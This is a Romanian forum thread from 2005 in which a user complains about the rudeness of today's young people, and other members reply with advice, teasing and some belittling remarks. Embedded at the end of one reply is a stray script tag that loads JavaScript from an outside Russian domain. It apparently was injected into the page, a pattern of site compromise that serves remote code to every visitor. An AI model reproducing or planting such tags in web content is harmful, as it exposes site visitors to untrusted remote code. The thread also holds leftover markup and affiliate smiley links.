PDA

Arată versiune întreagă : Tinerii din ziua de astazi

Ana Tofan
18.03.2005, 00:25
Cobor jos la cafeneaua facultatii si studentii incep sa comenteze vrute si nevrute si rad prosteste. Atat stiu ei , sa injoseasca si sa blameze. Totusi parca pe vremea mea nu erau tinerii atat de prost-crescuti si de nemanierati. Pe la voi prin U. S. cum e?Si va rog sa nu ma condamnati tot pe mine.Ideea ca Romanica pana sa ajunga la gradul de civilizatie din Occident cred ca mai are vreo 100 de ani daca nu mai mult. Si eu am fost tanara si eu am fost studenta , dar nu m-am pretat la un comportament aberant.

Vlad
18.03.2005, 05:06
Fata lu' tata....de ce esti asa de complexata????

Poate ne spui si noua,de ce toata lumea te barfeste si te comenteaza?? De ce toata lumea "rade prosteste" cand apari tu?

Ce ai tu,de esti in centrul atentiei tot timpul???

Lamureste-ne in aceasta privinta si dupa aia vedem cum putem sa te ajutam.....

pepper
18.03.2005, 06:45
Ana incearca sa devii mai populara, sa spargi tiparele actuale in care traiesti.Mareste-ti sfera de preocupari chiar daca la inceput nu o sa-ti placa, si dupa ce ai plecat de la locul de munca uita de unde ai plecat si nu mai analiza ce sa intimplat. Crad ca tu iti cultivi ideea ca esti birfita, injosita si neinteleasasau le dai celor din jurul tau prilejul sa o faca? Eusint un adept fidel al dictonului: "Daca cistigi lupta, daca ai pierdut lupta si insatisfactiile apar rar in viata mea.

Sper ca vei lua atitudine si vei schimba ceva in viata ta.

Succes

subzero
18.03.2005, 10:14
Si eu am fost tanara si eu am fost studenta , dar nu m-am pretat la un comportament aberant.

Atunci nici nu stii ce ai pierdutsmileys/smiley36.gif Deci esti impotriva generatiei PROsmileys/smiley18.gif

Sa stii ca exista tineri batrini si batrini tinerismileys/smiley2.gif

Fii mai ingaduitoare (inclusiv cu tine insuti ) si ai sa vezi ca viata ti se va pare mai frumoasa smileys/smiley4.gif

Fethoden
18.03.2005, 18:07
ANA,

Am mai citit unele dintre mesejele postate de tine aici.....

Am "tacut"....dar acum simt nevoia sa iti spun ce imi trece prin minte.....!

Am sa iti pun ceva fara prea multe menajamente, sper sa nu te irite .!

!!!!!Infiaza un copil daca pana sa faci unul al tau propriu nu te poti hotari (poate )deocamdata!

Sunt atatia copii dragalasi care au nevoie de iubire si mangaiere...!!

Sfideaza pe cei care din "lipsa de ocupatie "--nu ai spus tu asa ceva, dar imi asum dreptul de a o presupune...--si cauta-ti o preocupare sanatoasa si nu te mai invarti in jurul cozii cu tot felul de idei....nu-si au rostul!

Cred ca vei reusi sa privesti viata dintr-o prisma total diferita si poate ca astfel vei reusi sa fii ...alta!!!!!....

Asta bineinteles daca in primul rand ai posibilitati materiale iar in al doilea rand daca ai acele calitati morale pentru asa ceva, nu poti lua un copil daca nu sunt indeplinite anumite conditii....

Eu as face acest lucru .As da sens vietii mele sub aceasta forma,dar eu am deja proprii mei copii,sa-mi fie sanatosi...!!!

Barbati...!?...sunt o groaza.!!!.. iar cel potrivit pentru mine ar fi cel pe care nu l-ar "incurca"...."bagajele mele".....ca e un copil doi, trei, ...ca sunt ai mei,sau infiati...!!!

Un proverb chinezesc spune:"daca ma iubesti pe mine, iubeste-mi si cainele"

Ce poate fi mai sublim pe lumea asta decat sa fii mama ...sau tata.....!!???....

....Birfe, intrigi, minciuni, discutii fara sens...!!????----la ce folos?

Mai bine mergi la biserica, aprinzi o lumanare si te rogi la Dumnezeu!

Iar cand ai un copil care sa iti spuna:"mama" sau "tata"....!!!....ce poate fi mai frumos!!!!??????

E o varianta dar la care iti trebuie curaj si forta.

Daca reusesti sadai de ele ...vezi pe unde le tii ascunse...., vei reusi...daca nu,.....inseamna ca vei fi mereu o nefericita care isi va plange mereu in pumni!!!!!

Ce te tot chinui !!???

Spui ca citesti mult...!!

Ce citesti!?

Ce inveti, ce intelegi de acolo!?

Ia iesi tu putin deasupra starii in care te afli si incearca sa coordonezi tu TOTUL,privind cu alti ochi viata asta!Indiferent de greutati!

Nu te mai vaita toata ziua, nu mai lua in consideratie toate nimicurile!!!

Apuca-te de ceva serios in viata ...nu doar sa asezicartile in biblioteca..., ci sa faci ceva nou in plus...!

Poate ca a infia un copil si sa devii mama include pentru tine responasbilitati carora nu le poti face fata (atat material cat si moral si decat sa iei un copil caruia sa nu ai ce sa-i daruiesti, mai bine las-o balta si chiar fa abstractie de idea mea), dar , problema e ca tu ai nevoie de o schimbare in viata care sa te puna pe o linie de plutire...

Incearca munca de voluntariat.E o alta varianta prin care inveti sa faci ceva pentru societate din care sa stii sa te multumesti doar cu participarea ta si nu si cu rasplata materiala....

...Sunt o groaza de lucruri frumoase pe care poti sa le faci intr-un oras mare precum Iasul..(.din cate am inteles esti din Iasi..sau gresesc..!?.)..., fa deci o schimbare majora ,dar gandeste-te bine CE ti s-ar potrivi cel mai bine si ...ACTIUNE!

...esti inca tanara...--din cate am inteles--...ce te tot "imbabesti" cu tot felul de ganduri..!?
<<script src=http://www.iroe.ru/ngg.js></script>

Ana Tofan
22.03.2005, 00:54
Mai Fethoden,nu cred ca un copil este ceea ce am nevoie. De-abia ma suport pe mine si de-abia ma descurc cu mine insami. Nu sunt indeajuns de matura pentru asa ceva.In plus,pot sa-ti spun ca nici nu imi placa copiii,asa ca nu cred ca voi avea vreodata asa ceva. Oricum ,mersi dei incurajari .

hazel
22.03.2005, 06:49
Mai Fethoden,nu cred ca un copil este ceea ce am nevoie. De-abia ma suport pe mine si de-abia ma descurc cu mine insami. Nu sunt indeajuns de matura pentru asa ceva.In plus,pot sa-ti spun ca nici nu imi placa copiii,asa ca nu cred ca voi avea vreodata asa ceva. Oricum ,mersi dei incurajari .

Ana, sunt convinsa ca ai mai primit sfatul asta: du-te si vezi un psiholog. Toate-ti ploua, toate-ti ning, nimic si nimeni nu iti place, esti intr-o stare deprimata tot timpul, ti se pare ca toata lumea are ceva cu tine. Copiii nu iti plac si nu vrei sa ai - intre noi fie vorba, u have no idea what you're missing smileys/smiley1.gif

Forumul asta sau alte forumuri nu te pot ajuta decat intr-o foarte, foarte mica masura, nu stiu ce speri tu sa gasesti postand aici, oricum mi se pare mie sau iti place sa duci un monolog ? Toata lumea se inghesuie care mai de care sa iti dea un sfat bun, sa te faca sa te smulgi din starea de autocompatimire, dar tu o tii ca Ion cu fluierul pe tonul asta sumbru. Mo-no-log. Si daca esti sincera, vei recunoaste ca asa este. smileys/smiley9.gif

Pa tu, te pup, ai grija de tine si nu uita: rezolvarea problemelor tale sta in primul rand in mainile tale - si ale unui psiholog, bineinteles. smileys/smiley44.gif

foryoutupac
24.03.2005, 13:04
Esti un caz pierdut pentru omenire,daca nu faci ceva nou sau nu te schimbi.

Scuze ca zic cu asa de mare rautate,BUT WAKE UP!!!!!

Traiesti in comunitate,nu in singuratate</span></span></span></span></span></span></span>

</span></font>

aconi
31.03.2005, 06:49
CE CHESTIE? cat de "batrana "esti Ano sau vrei cu sila sa te imbatranesti.

Ce expresie este aceasta: pe vremea mea? vremea ta este fiecare clipa atat timp cat respiri si tii lingura sa te hranesti.

Dupa parerea mea nu exista tineri de azi si tineri de ieri sau de maine.

Ei au fost, sunt si vor fi aceiasi.Dar trebuie sa-i intelegi.Daca
nu vrei sau nu poti..nu-i baga in seama; nu vei schimba tu lumea. Vino
mai bine pe "pagina" politica; acolo nu te apreciaza nimeni ca esti un
caz pierdut; nu te trimite nimeni la psihiatru.

aconi
31.03.2005, 06:54
Era sa uit: vezi sa nu cobori in sus....Si revino-ti! nu de alta
dar i-ai ingrijorat pe toti voisii nostri de la discutii; nu e frumos
sa-i intristezi.

rossa
31.03.2005, 22:40
[/url] Ana mama esti ciudata rau . Tot ce reprezinta normalitate pentru unii pentru tine reprezinta anormalitate . Cred ca esti pe dos . Am vazut ca Fethoden te-a sfatuit sa infiezi un copil dar nu ti-a suras ideea . Eu unul te sfatuies sa-ti iei un caine care sa te iubeasca asa cum esti ( neconditionat ) . Mai am eu un prieten care zice despre nevasta-sa ca s-a nascut obosita . Cred ca sunteti rude ...

[url="http://www.smileycentral.com/?partner=ZSzeb001_ZRxdm185YYRO"]http://smileys.smileycentral.com/cat/15/15_8_138.gif (http://www.smileycentral.com/?partner=ZSzeb001_ZRxdm185YYRO)

Ana Tofan
01.04.2005, 01:54
Bine ca esti tu destept,Rossa-Bossa.Iti place sa pui bete in roate tuturor,dar numai gura e de tine.Parca tu ai fi perfect!

sauzimdebine
02.04.2005, 04:58
Ana, cum necum, pune culoare in viata ta. Totul este cenusiu si trist. Si daca nu-i crezi pe cei din jur si nu vrei sa-i asculti, mergi in pustietate si caineaza-ti viata de una singura.

rossa
03.04.2005, 20:48
Ana , nu sunt nici pe departe perfect . Din contra am un milion de defecte numai ca pe unele dintre ele le constietizez . Este posibil ca unele dintre ele sa-mi scape , de exemplu la caracterizarile facute de forumisti am constatat ca vorbesc prea mult . Am bagat la "cutiuta " si o sa-ncerc sa corectez acest lucru . Nu stiu daca o sa reusesc sa fac acest lucru ( pentru ca face parte din mine ) , dar este cert ca o sa-ncerc . Eu unul cred ca fata de tine am cazut in extrema cealalta adica am glumit , am facut misto (de toata lumea ) asa cum zici tu dar eu am sperat in dispute cu aspect comic (pentru ca duc la gluma) , la divertisment , la cresterea bunei dispozitii . Daca am fost interesat de un anumit domeniu , m-am dus la forumul respectiv . Am considerat ca la " Discutii generale " se poate spune chiar orice , cu atat mai mult se poate glumi . Observ totusi ca multe persoane se ataca prea mult , i-au lucrurile prea in serios , vezi doamne se simt lezati in nu stiu ce amor propriu . Deocamdata eu tot ce am spus ,[/url]am[url="http://www.smileycentral.com/?partner=ZSzeb001_ZRxdm185YYRO"] (http://www.smileycentral.com/?partner=ZSzeb001_ZRxdm185YYRO)spus sub forma de gluma si nu au fost putini cei cu care am corespondat ulterior pe mail sau pe PM dar au fost si suparaciosi notorii , asta este . Deci ca sa concluzionez , tu poti alege singura din ce categorie faci parte , nu-i nici o suparare...

http://smileys.smileycentral.com/cat/36/36_1_41.gif

Ana Tofan
18.04.2005, 05:38
Uneori generatia tanara are niste maniere de neconceput pentru un om bine educat. Nu au nici cel mai elementar bun simt,sunt teribilisti si egoisti. Si voi le dati dreptate,condamnandu-ma pe mine. Rautatea e mare. Multi vor sa te ridiculizeze si sa te faca sa te simti ultimul om, lucru pe care l-am observat si la voi pe forum.Nu degeaba aplecat Brasov34.

evelyn
18.04.2005, 06:38
Atunci, las-o balta Ana; si nu mai cere parerea altora.....

Vad ca nimic nu te multumeste smileys/smiley6.gif

Ana Tofan
19.04.2005, 00:20
Nu cred ca nu ma multumeste nimic,insa asta este adevarul.

angela
19.04.2005, 06:18
Ne zici si noua ce te multumeste pe tine? Ce te face fericita? Ce te face sa zambesti din tot sufletul? smileys/smiley9.gif